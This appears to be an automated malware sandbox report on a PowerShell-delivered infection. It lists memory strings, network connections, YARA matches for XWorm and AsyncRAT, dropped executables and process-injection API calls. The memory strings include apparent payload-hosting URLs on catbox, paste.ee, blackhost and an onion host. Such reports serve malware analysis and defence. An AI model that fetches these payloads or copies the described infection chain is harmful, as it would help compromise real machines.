Source: lsass.exe, 00000016.00000002.2454969370.000002D6CE4BA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1356206662.000002D6CE450000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1356303214.000002D6CE4BA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2454969370.000002D6CE4F0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1356524069.000002D6CE5AC000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2463085683.000002D6CE5AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000011.00000002.1357130417.0000026A4A14B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: cZp98.exe, 00000010.00000002.1318785193.0000000001085000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mDeU
Source: powershell.exe, 00000005.00000002.1243180713.0000000004B46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: lsass.exe, 00000016.00000000.1355628623.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2434653599.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000016.00000000.1355628623.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2434653599.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000000.00000002.1381131314.00000000053FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1243180713.00000000049F1000.00000004.00000800.00020000.00000000.sdmp, SVrB5SO0.exe, 0000000F.00000002.2458610263.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1357130417.0000026A49F21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000016.00000002.2435366666.000002D6CDC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1355628623.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1355663816.000002D6CDC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2434653599.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: powershell.exe, 00000005.00000002.1243180713.0000000004B46000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1355628623.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2434653599.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000016.00000000.1355628623.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2434653599.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ertiesP
Source: lsass.exe, 00000016.00000002.2434653599.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: powershell.exe, 00000011.00000002.1357130417.0000026A4A14B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1350767206.0000000005204000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.blackhost.xyz
Source: powershell.exe, 00000005.00000002.1254100995.0000000007F1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coqQ
Source: powershell.exe, 00000000.00000002.1381131314.0000000005439000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000011.00000002.1357130417.0000026A49F21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1381131314.0000000005428000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1243180713.00000000049F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.1350767206.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: powershell.exe, 00000003.00000002.1350767206.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: powershell.exe, 00000003.00000002.1350767206.0000000005225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://blackhost7pws76u6vohksdahnm6adf7riukgcmahrwt43wv2drvyxid.onion/srv/fup/uploads/DRGDF.HGFG
Source: powershell.exe, 00000003.00000002.1350767206.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: powershell.exe, 00000003.00000002.1350767206.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 00000011.00000002.1436533880.0000026A59F97000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.1436533880.0000026A59F97000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.1436533880.0000026A59F97000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.c
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.ca
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.cat
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catb
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbo
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.m
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.mo
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000005230000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/
Source: powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/cfuoi8.
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/cfuoi8.fuk
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/cfuoi8.fuk$M
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/cfuoi8.fuk-Path
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/n
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/n8
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/n8n
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/n8nu
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/n8nug
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/n8nug3
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/n8nug3.
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/n8nug3.f
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/n8nug3.fu
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/n8nug3.fuc
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000005230000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/n8nug3.fuck
Source: powershell.exe, 00000003.00000002.1350767206.0000000005230000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/n8nug3.fuck$M
Source: powershell.exe, 00000003.00000002.1350767206.0000000005230000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/n8nug3.fuckPath
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000005230000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe;
Source: powershell.exe, 00000003.00000002.1350767206.0000000005230000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moeD
Source: powershell.exe, 00000003.00000002.1350767206.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: powershell.exe, 00000003.00000002.1350767206.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: Microsoft-Windows-Bits-Client%4Operational.evtx.31.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: Microsoft-Windows-Bits-Client%4Operational.evtx.31.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod
Source: edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: Microsoft-Windows-Bits-Client%4Operational.evtx.31.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdC:
Source: Microsoft-Windows-Bits-Client%4Operational.evtx.31.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000004.00000003.1203397070.0000014F1C772000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001F.00000000.1444050439.000001EA19B5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2481275686.000001EA19059000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2514795662.000001EA19B5B000.00000004.00000001.00020000.00000000.sdmp, edb.log.4.dr, Microsoft-Windows-Bits-Client%4Operational.evtx.31.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: svchost.exe, 0000001F.00000000.1444050439.000001EA19B5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2481275686.000001EA19059000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2514795662.000001EA19B5B000.00000004.00000001.00020000.00000000.sdmp, Microsoft-Windows-Bits-Client%4Operational.evtx.31.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96C:
Source: Microsoft-Windows-Bits-Client%4Operational.evtx.31.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2C:
Source: powershell.exe, 00000011.00000002.1357130417.0000026A4A14B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000011.00000002.1357130417.0000026A4B45A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: SVrB5SO0.exe, 0000000F.00000002.2458610263.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, SVrB5SO0.exe, 0000000F.00000002.2458610263.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i.ibb.co
Source: powershell.exe, 00000003.00000002.1350767206.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000005225000.00000004.00000800.00020000.00000000.sdmp, SVrB5SO0.exe, 0000000F.00000000.1281920599.0000000000B02000.00000002.00000001.01000000.0000000E.sdmp, SVrB5SO0.exe, 0000000F.00000002.2458610263.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, SVrB5SO0.exe.3.dr	String found in binary or memory: https://i.ibb.co/Dwrj41N/Image.png
Source: SVrB5SO0.exe, 0000000F.00000002.2458610263.0000000002E60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i.ibb.coX
Source: powershell.exe, 00000003.00000002.1360704931.00000000059FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1247032360.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1436533880.0000026A59F97000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000004.00000003.1203397070.0000014F1C772000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 0000001F.00000000.1444050439.000001EA19B5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2481275686.000001EA19059000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2514795662.000001EA19B5B000.00000004.00000001.00020000.00000000.sdmp, Microsoft-Windows-Bits-Client%4Operational.evtx.31.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exeC:
Source: svchost.exe, 0000001F.00000000.1444050439.000001EA19B5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2481275686.000001EA19059000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2514795662.000001EA19B5B000.00000004.00000001.00020000.00000000.sdmp, Microsoft-Windows-Bits-Client%4Operational.evtx.31.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exeEEVJ
Source: edb.log.4.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee
Source: powershell.exe, 00000003.00000002.1347927579.0000000002DF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000000.1437866031.000001EA191DA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1459618414.000001EA19775000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000000.1439818784.000001EA194A3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1452259430.000001EA1976E000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000000.1443637055.000001EA19AAB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000000.1442210061.000001EA19713000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000000.1443718226.000001EA19ACC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000000.1443152424.000001EA19984000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000000.1443064627.000001EA19943000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2443672999.000001EA17613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2503555778.000001EA19777000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2491410388.000001EA194A7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000000.1441104646.000001EA195BA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1450884827.000001EA195BB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1453094054.000001EA195DB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2510997377.000001EA19AAB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1449001234.000001EA19747000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1449449188.000001EA19765000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2511905870.000001EA19ACC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1445514178.000001EA1972E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/linhgh7d
Source: powershell.exe, 00000003.00000002.1350767206.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: powershell.exe, 00000003.00000002.1350767206.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000003.00000002.1350767206.0000000005204000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.blackhost.xyz
Source: powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.blackhost.xyz/srv/fu
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.blackhost.xyz/srv/fup/uploads/DRGDF.HGFG
Source: powershell.exe, 00000003.00000002.1350767206.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000003.00000002.1350767206.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: powershell.exe, 00000003.00000002.1350767206.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55628
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55611 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55620
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55621
Source: unknown	Network traffic detected: HTTP traffic on port 55593 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55593
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55594
Source: unknown	Network traffic detected: HTTP traffic on port 55601 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55597 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55620 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 55628 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 55616 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55597
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55630
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55598
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55632
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55602 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55630 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55594 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 55606 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55613 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55606
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55608
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55601
Source: unknown	Network traffic detected: HTTP traffic on port 55598 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55602
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55632 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55617 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55616
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55617
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55613
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55611
Source: unknown	Network traffic detected: HTTP traffic on port 55608 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55621 -> 443

Source: unknown	HTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.4:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.238.145.99:443 -> 192.168.2.4:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.82.79:443 -> 192.168.2.4:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.10.182:443 -> 192.168.2.4:55613 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.10.182:443 -> 192.168.2.4:55617 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.10.182:443 -> 192.168.2.4:55621 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.10.182:443 -> 192.168.2.4:55628 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.10.182:443 -> 192.168.2.4:55632 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 15.0.SVrB5SO0.exe.b00000.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 15.0.SVrB5SO0.exe.b00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000F.00000000.1281920599.0000000000B02000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000002.1350767206.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000002.1350767206.0000000005225000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\ProgramData\SVrB5SO0.exe, type: DROPPED	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: C:\ProgramData\SVrB5SO0.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\SVrB5SO0.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\j3owB.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\cZp98.exe	Jump to dropped file

Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E629A0 NtEnumerateValueKey,NtEnumerateValueKey,	2_2_000001CB53E629A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFC3C730A4E NtUnmapViewOfSection,	17_2_00007FFC3C730A4E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFC3C730F30 NtSetContextThread,	17_2_00007FFC3C730F30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFC3C730C6D NtWriteVirtualMemory,	17_2_00007FFC3C730C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFC3C730FF8 NtResumeThread,	17_2_00007FFC3C730FF8
Source: C:\Windows\System32\dllhost.exe	Code function: 20_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,	20_2_0000000140001868
Source: C:\Windows\System32\winlogon.exe	Code function: 21_2_0000018AF96929A0 NtEnumerateValueKey,NtEnumerateValueKey,	21_2_0000018AF96929A0
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_000002D6CEB72120 NtQuerySystemInformation,StrCmpNIW,	22_2_000002D6CEB72120

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\__PSScriptPolicyTest_htfbnthp.urm.ps1

Source: C:\Windows\System32\notepad.exe	Code function: 2_3_000001CB53D22004	2_3_000001CB53D22004
